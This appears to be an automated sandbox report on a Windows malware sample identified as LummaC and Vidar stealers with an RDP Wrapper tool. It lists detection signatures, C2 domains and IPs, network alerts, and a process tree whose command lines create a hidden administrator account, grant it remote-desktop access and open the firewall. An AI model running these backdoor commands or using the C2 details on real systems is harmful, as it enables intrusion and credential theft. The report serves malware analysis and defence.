Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519784
MD5:	6fd36225fe8b30bef2ba91748be1be69
SHA1:	1dd29bec09dcb70474865f9aa06158d4ba60df77
SHA256:	5c0e7c82e65dfbf8b4416abe9734d66b52acfd695a0686107454f12698f329db
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, RDPWrap Tool, LummaC Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a new user with administrator rights

Allocates memory in foreign processes

Allows multiple concurrent remote connection

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Enables remote desktop connection

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Modifies the windows firewall

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: RDP Sensitive Settings Changed

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected RDPWrap Tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: New User Created Via Net.EXE

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6FD36225FE8B30BEF2BA91748BE1BE69)

conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7032 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BGDGHJEHJJ.exe (PID: 6552 cmdline: "C:\ProgramData\BGDGHJEHJJ.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)

conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

GIJEGDAKEH.exe (PID: 5376 cmdline: "C:\ProgramData\GIJEGDAKEH.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

BKJKEBGDHD.exe (PID: 6240 cmdline: "C:\ProgramData\BKJKEBGDHD.exe" MD5: D02AAA17F2AE30945D65603531DCAE56)

cmd.exe (PID: 5876 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6856 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6808 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 4856 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RDPWInst.exe (PID: 5576 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)

netsh.exe (PID: 5464 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 6732 cmdline: "cmd.exe" /c net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 4800 cmdline: net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 5056 cmdline: C:\Windows\system32\net1 user RDPUser_7fdfafe0 wpaeOjzjqF4B /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 4916 cmdline: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 4512 cmdline: net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6304 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 3496 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 3652 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 1812 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 3604 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 6204 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 2436 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_7fdfafe0 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 2332 cmdline: net localgroup "Administrators" RDPUser_7fdfafe0 /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 1396 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_7fdfafe0 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 2716 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECBGHCGCBKFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6712 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 77FF15B9237D62A5CBC6C80E5B20A492)

rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)

tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["stogeneratmns.shop", "offensivedzvju.shop", "drawzhotdog.shop", "vozmeatillu.shop", "fragnantbui.shop", "ghostreedmnu.shop", "wallkedsleeoi.shop", "reinforcenh.shop", "gutterydhowi.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "4b74261d834413e886f920a1e9dc5b33"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\BKJKEBGDHD.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2843926018.000000000150A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000016.00000000.2818017493.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.2857759824.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000016.00000000.2818115100.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
Process Memory Space: file.exe PID: 3492	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 3492	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3492	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7032	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7032	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7032	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7032	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 3532	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BKJKEBGDHD.exe PID: 6240	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RDPWInst.exe PID: 5576	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
15.0.BKJKEBGDHD.exe.ad0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3ab5570.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3ab5570.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3ab5570.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3ab5570.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
22.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
22.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
22.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
22.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\ProgramData\BKJKEBGDHD.exe, Initiated: true, ProcessId: 6240, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 57922

Sigma detected: RDP Sensitive Settings Changed

Source: Registry Key set

Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 5576, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll

Sigma detected: Suspicious Add User to Remote Desktop Users Group

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add, CommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\BKJKEBGDHD.exe" , ParentImage: C:\ProgramData\BKJKEBGDHD.exe, ParentProcessId: 6240, ParentProcessName: BKJKEBGDHD.exe, ProcessCommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add, ProcessId: 4916, ProcessName: cmd.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys

Sigma detected: New User Created Via Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add, CommandLine: net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6732, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add, ProcessId: 4800, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5876, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6856, ProcessName: net.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5876, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6856, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:28:29.477619+0200	2028765	3	Unknown Traffic	192.168.2.6	57877	5.75.211.162	443	TCP
2024-09-27T00:28:30.808738+0200	2028765	3	Unknown Traffic	192.168.2.6	57878	5.75.211.162	443	TCP
2024-09-27T00:28:32.182085+0200	2028765	3	Unknown Traffic	192.168.2.6	57879	5.75.211.162	443	TCP
2024-09-27T00:28:33.571933+0200	2028765	3	Unknown Traffic	192.168.2.6	57880	5.75.211.162	443	TCP
2024-09-27T00:28:34.930020+0200	2028765	3	Unknown Traffic	192.168.2.6	57881	5.75.211.162	443	TCP
2024-09-27T00:28:36.410141+0200	2028765	3	Unknown Traffic	192.168.2.6	57882	5.75.211.162	443	TCP
2024-09-27T00:28:37.422761+0200	2028765	3	Unknown Traffic	192.168.2.6	57883	5.75.211.162	443	TCP
2024-09-27T00:28:40.578814+0200	2028765	3	Unknown Traffic	192.168.2.6	57884	5.75.211.162	443	TCP
2024-09-27T00:28:41.676249+0200	2028765	3	Unknown Traffic	192.168.2.6	57885	5.75.211.162	443	TCP
2024-09-27T00:28:42.813029+0200	2028765	3	Unknown Traffic	192.168.2.6	57886	5.75.211.162	443	TCP
2024-09-27T00:28:43.908857+0200	2028765	3	Unknown Traffic	192.168.2.6	57887	5.75.211.162	443	TCP
2024-09-27T00:28:45.641020+0200	2028765	3	Unknown Traffic	192.168.2.6	57888	5.75.211.162	443	TCP
2024-09-27T00:28:47.649559+0200	2028765	3	Unknown Traffic	192.168.2.6	57890	5.75.211.162	443	TCP
2024-09-27T00:28:49.228375+0200	2028765	3	Unknown Traffic	192.168.2.6	57891	5.75.211.162	443	TCP
2024-09-27T00:28:50.789135+0200	2028765	3	Unknown Traffic	192.168.2.6	57892	5.75.211.162	443	TCP
2024-09-27T00:28:52.068485+0200	2028765	3	Unknown Traffic	192.168.2.6	57893	5.75.211.162	443	TCP
2024-09-27T00:28:55.175699+0200	2028765	3	Unknown Traffic	192.168.2.6	57894	5.75.211.162	443	TCP
2024-09-27T00:28:56.630209+0200	2028765	3	Unknown Traffic	192.168.2.6	57895	5.75.211.162	443	TCP
2024-09-27T00:28:58.006840+0200	2028765	3	Unknown Traffic	192.168.2.6	57896	5.75.211.162	443	TCP
2024-09-27T00:28:59.441471+0200	2028765	3	Unknown Traffic	192.168.2.6	57897	5.75.211.162	443	TCP
2024-09-27T00:29:01.494684+0200	2028765	3	Unknown Traffic	192.168.2.6	57899	5.75.211.162	443	TCP
2024-09-27T00:29:03.467077+0200	2028765	3	Unknown Traffic	192.168.2.6	57900	5.75.211.162	443	TCP
2024-09-27T00:29:06.239823+0200	2028765	3	Unknown Traffic	192.168.2.6	57902	5.75.211.162	443	TCP
2024-09-27T00:29:08.394353+0200	2028765	3	Unknown Traffic	192.168.2.6	57905	5.75.211.162	443	TCP
2024-09-27T00:29:10.529995+0200	2028765	3	Unknown Traffic	192.168.2.6	57909	5.75.211.162	443	TCP
2024-09-27T00:29:12.217613+0200	2028765	3	Unknown Traffic	192.168.2.6	57913	5.75.211.162	443	TCP
2024-09-27T00:29:47.020497+0200	2028765	3	Unknown Traffic	192.168.2.6	57926	5.75.211.162	443	TCP
2024-09-27T00:29:48.372023+0200	2028765	3	Unknown Traffic	192.168.2.6	57927	5.75.211.162	443	TCP
2024-09-27T00:29:49.792507+0200	2028765	3	Unknown Traffic	192.168.2.6	57928	5.75.211.162	443	TCP
2024-09-27T00:29:51.385668+0200	2028765	3	Unknown Traffic	192.168.2.6	57929	5.75.211.162	443	TCP
2024-09-27T00:29:52.773148+0200	2028765	3	Unknown Traffic	192.168.2.6	57930	5.75.211.162	443	TCP
2024-09-27T00:29:54.775042+0200	2028765	3	Unknown Traffic	192.168.2.6	57931	5.75.211.162	443	TCP
2024-09-27T00:29:56.087727+0200	2028765	3	Unknown Traffic	192.168.2.6	57932	5.75.211.162	443	TCP
2024-09-27T00:29:59.256056+0200	2028765	3	Unknown Traffic	192.168.2.6	57933	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:06.870506+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57903	172.67.194.216	443	TCP
2024-09-27T00:29:07.851698+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57904	104.21.4.136	443	TCP
2024-09-27T00:29:08.829782+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57906	188.114.97.3	443	TCP
2024-09-27T00:29:09.900040+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57908	188.114.96.3	443	TCP
2024-09-27T00:29:10.906459+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57910	188.114.97.3	443	TCP
2024-09-27T00:29:11.891502+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57912	172.67.162.108	443	TCP
2024-09-27T00:29:12.953361+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57914	188.114.97.3	443	TCP
2024-09-27T00:29:13.915740+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57916	188.114.97.3	443	TCP
2024-09-27T00:29:15.087760+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57917	104.21.77.130	443	TCP
2024-09-27T00:29:17.420415+0200	2054653	1	A Network Trojan was detected	192.168.2.6	57919	172.67.128.144	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T00:29:06.870506+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57903	172.67.194.216	443	TCP
2024-09-27T00:29:07.851698+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57904	104.21.4.136	443	TCP
2024-09-27T00:29:08.829782+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57906	188.114.97.3	443	TCP
2024-09-27T00:29:09.900040+0200	2049836	1	A Network Trojan was detected	192.168.2.6	57908	188.114.96.3	443	TCP
